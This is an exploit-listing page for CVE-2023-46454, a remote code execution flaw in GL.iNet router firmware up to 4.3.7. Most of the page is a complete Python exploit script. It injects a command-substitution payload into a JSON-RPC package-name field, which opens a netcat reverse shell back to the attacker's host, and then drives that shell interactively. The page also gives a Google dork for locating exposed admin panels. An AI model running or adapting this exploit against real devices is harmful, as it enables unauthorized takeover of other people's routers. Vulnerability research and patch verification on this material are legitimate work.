GL.iNet - exploit.company

vendor:

GL.iNet

by:

Michele 'cyberaz0r' Di Bonaventura

8.1

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: GL.iNet

Affected Version From: <= 4.3.7

Affected Version To: 4.3.2007

Patch Exists: NO

Related CWE: CVE-2023-46454

CPE: -

Metasploit:

Other Scripts:

Platforms Tested: GL.iNet AR300M

2023

GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client

The GL.iNet firmware version 4.3.7 is vulnerable to remote code execution via the OpenVPN client. An attacker can exploit this vulnerability to execute arbitrary code on the target system. This vulnerability has been assigned the CVE-2023-46454.

Mitigation:

To mitigate this vulnerability, users are advised to update their GL.iNet firmware to a version higher than 4.3.7 and avoid exposing the device to untrusted networks.

Source

Exploit-DB raw data:

#!/usr/bin/env python3

# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
# Version: 4.3.7
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46454

import socket
import requests
import readline
from time import sleep
from random import randint
from sys import stdout, argv
from threading import Thread

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def trigger_revshell(url, auth_token, payload):
	sleep(0.25)
	data = {
		'jsonrpc': '2.0',
		'id': randint(1000, 9999),
		'method': 'call',
		'params': [
			auth_token,
			'plugins',
			'get_package_info',
			{'name': 'bas{}e-files'.format(payload)}
		]
	}
	requests.post(url, json=data, verify=False)

def get_command_response(s):
	res = ''
	while True:
		try:
			resp = s.recv(1).decode('utf-8')
			res += resp
		except UnicodeDecodeError:
			pass
		except socket.timeout:
			break
	return res

def revshell_listen(revshell_ip, revshell_port):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.settimeout(5)

	try:
		s.bind((revshell_ip, int(revshell_port)))
		s.listen(1)
	except Exception as e:
		print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
		exit(1)

	try:
		clsock, claddr = s.accept()
		clsock.settimeout(2)
		if clsock:
			print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
			res = ''
			while True:
				command = input('$ ')
				clsock.sendall('{}\n'.format(command).encode('utf-8'))
				stdout.write(get_command_response(clsock))

	except socket.timeout:
		print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
		s.close()

	except KeyboardInterrupt:
		print('\n[*] Closing connection')
		try:
			clsock.close()
		except socket.error:
			pass
		except NameError:
			pass
		s.close()

def main(base_url, auth_token, revshell_ip, revshell_port):
	print('[+] Started GL.iNet <= 4.3.7 RCE exploit')

	payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
	print('[+] Reverse shell payload: "{}"'.format(payload))

	print('[*] Triggering reverse shell connection')
	Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()

	print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
	revshell_listen(revshell_ip, revshell_port)

	print('[+] Done')

if __name__ == '__main__':
	if len(argv) < 5:
		print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
		exit(1)

	main(argv[1], argv[2], argv[3], argv[4])